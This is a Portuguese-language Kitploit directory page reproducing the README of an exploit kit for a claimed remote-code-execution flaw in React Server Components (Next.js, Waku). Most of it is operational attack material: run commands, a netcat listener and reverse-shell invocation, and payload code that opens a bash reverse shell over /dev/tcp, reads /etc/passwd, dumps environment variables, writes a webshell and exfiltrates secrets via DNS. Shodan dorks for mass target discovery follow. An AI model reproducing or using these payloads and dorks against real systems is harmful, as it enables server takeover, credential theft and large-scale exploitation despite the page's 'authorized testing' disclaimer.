Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-RCE-CVE-2025-55182 — Kit de exploração RCE avançado para vulnerabilidades de React Server Components. Possui múltiplos payloads pré-construídos, integração com Shodan para descoberta de alvos e varredura em massa para testes de penetração autorizados. | Kitploit
Ferramentas/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Desenvolvimento de Payloads
GitHubilixm/poc-rce-cve-2025-55182

PoC-RCE-CVE-2025-55182

Kit de exploração RCE avançado para vulnerabilidades de React Server Components. Possui múltiplos payloads pré-construídos, integração com Shodan para descoberta de alvos e varredura em massa para testes de penetração autorizados.

Ver Repositório
14há 9 mesesAinda não revisado
Compartilhar

🔥 Kit de Exploração RSC RCE

Version License Node Platform

Kit de exploração avançado para vulnerabilidades de Execução Remota de Código em React Server Components

Apenas para testes de penetração autorizados e pesquisa de segurança

Recursos • Instalação • Uso • Integração com Shodan • Exemplos • Aviso Legal


📋 Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Recursos
  • Instalação
  • Início Rápido
  • Uso
    • Exploração Básica
    • Payloads Disponíveis
    • Payloads Personalizados
  • Integração Shodan
  • Varredura Automatizada
  • Exemplos
  • Mitigação
  • Versões Afetadas
  • Contribuindo
  • Aviso Legal
  • Licença

🎯 Visão Geral

Este kit explora uma vulnerabilidade crítica de Execução Remota de Código (RCE) em implementações de React Server Components (RSC), visando especificamente:

  • Next.js (versões 13.4.0 - 14.1.0)
  • Waku (versões vulneráveis)

A vulnerabilidade aproveita poluição de protótipo e desserialização insegura no mecanismo de manipulação de dados do RSC para alcançar execução arbitrária de código no servidor.

🔴 Gravidade: CRÍTICA

  • Pontuação CVSS: 9.8 (Crítica)
  • Vetor de Ataque: Rede
  • Privilégios Necessários: Nenhum
  • Interação do Usuário: Nenhuma
  • Impacto: Comprometimento completo do servidor

🔬 Detalhes da Vulnerabilidade

Contexto Técnico

React Server Components usam um formato de serialização personalizado para transferir dados entre cliente e servidor. A vulnerabilidade existe na forma como esses frameworks desserializam e processam payloads especialmente criados.

Cadeia de Ataque:

  1. Construção do Payload: Criar um payload RSC malicioso com referências circulares
  2. Poluição de Protótipo: Abusar de $X:constructor:constructor para acessar o construtor Function
  3. Injeção de Código: Injetar JavaScript arbitrário no campo _prefix
  4. Execução: O servidor desserializa e executa o payload

Fluxo de Exploração

Atacante → Payload RSC Malicioso → Servidor Alvo
                                         ↓
                              Desserialização Insegura
                                         ↓
                              Acesso à Cadeia de Protótipos
                                         ↓
                              Construtor de Função
                                         ↓
                              ⚠️ RCE ALCANÇADA ⚠️

✨ Recursos

Capacidades Principais

  • ✅ Suporte a Múltiplos Frameworks: Next.js e Waku
  • ✅ 8 Payloads Pré-construídos: De PoC a reverse shells completos
  • ✅ Execução de Código Personalizado: Injete qualquer código JavaScript
  • ✅ Integração Shodan: Descoberta automatizada de alvos
  • ✅ Varredura em Massa: Teste vários alvos automaticamente
  • ✅ CLI Profissional: Interface de linha de comando completa
  • ✅ Registro Detalhado: Saída codificada por cores com timestamps
  • ✅ Tratamento de Erros: Gerenciamento robusto de erros

Payloads Pré-construídas

PayloadDescriçãoCaso de Uso
consolePoC básico (console.log)Verificar vulnerabilidade
reverseShellReverse shell bashAcesso inicial
readFileLer /etc/passwdAcesso ao sistema de arquivos
envDumpDespejar variáveis de ambienteExtração de credenciais
execCommandExecutar comandos do sistemaExecução arbitrária de comandos
webshellImplantar webshell ExpressAcesso persistente
exfilPackageExfiltrar package.jsonAnálise de dependências
dnsExfilExfiltração DNS (OOB)Exploração cega

📦 Instalação

Pré-requisitos

  • Node.js >= 16.0.0
  • npm ou yarn
  • Shodan CLI (opcional, para varredura automatizada)

Clonar Repositório

git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

Instalar Dependências

npm install
# or
yarn install

Configurar Shodan (Opcional)

# Install Shodan CLI
pip install shodan

# Initialize with your API key
shodan init YOUR_API_KEY

🚀 Início Rápido

1. Verificação Básica de Vulnerabilidade

node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console

2. Obter um Reverse Shell

# Start listener
nc -lvnp 4444

# Execute exploit
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. Executar Comando Personalizado

node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"

📖 Uso

Exploração Básica

node rsc-rce-exploit.js [options]

Opções

OpçãoDescriçãoObrigatório
--target <url>URL do alvo✅
--framework <name>Framework: next ou waku❌ (padrão: next)
--payload <name>Nome do payload (veja abaixo)✅*
--custom <code>Código JavaScript personalizado✅*
--lhost <ip>Seu IP (para reverse shell)❌
--lport <port>Sua porta (para reverse shell)❌
--command <cmd>Comando a executar❌
--endpoint <path>Endpoint RSC personalizado (Waku)❌
--action-id <id>ID next-action personalizado❌
--listListar payloads disponíveis❌
--verboseSaída detalhada❌
--helpMostrar ajuda❌

*É necessário --payload ou --custom

Payloads Disponíveis

Veja todos os payloads:

node rsc-rce-exploit.js --list

Saída:

📋 Payloads disponíveis:

  console              - PoC básico - Saída no console
    Código: console.log(7*7+1)

  reverseShell         - Reverse shell (bash)
    Código: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - Ler /etc/passwd
    Código: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - Despejar variáveis de ambiente
    Código: console.log(JSON.stringify(process.env,null,2))

  execCommand          - Executar comando do sistema
    Código: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - Escrever webshell em /tmp
    Código: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - Ler package.json
    Código: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - Exfiltração DNS
    Código: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

Payloads Personalizados

Execute qualquer código JavaScript:

node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

🌐 Integração Shodan

Dorks do Shodan

Alvos Next.js

# Next.js básico
http.component:"Next.js"

# Next.js com RSC
http.html:"__next" http.html:"RSC"

# Next.js em modo dev (mais vulnerável)
http.html:"__NEXT_DATA__" http.html:"development"

# Next.js auto-hospedado (não no Vercel)
http.component:"Next.js" -org:"Vercel"

# Segmentado geograficamente (França)
http.component:"Next.js" country:FR
Baixar ferramenta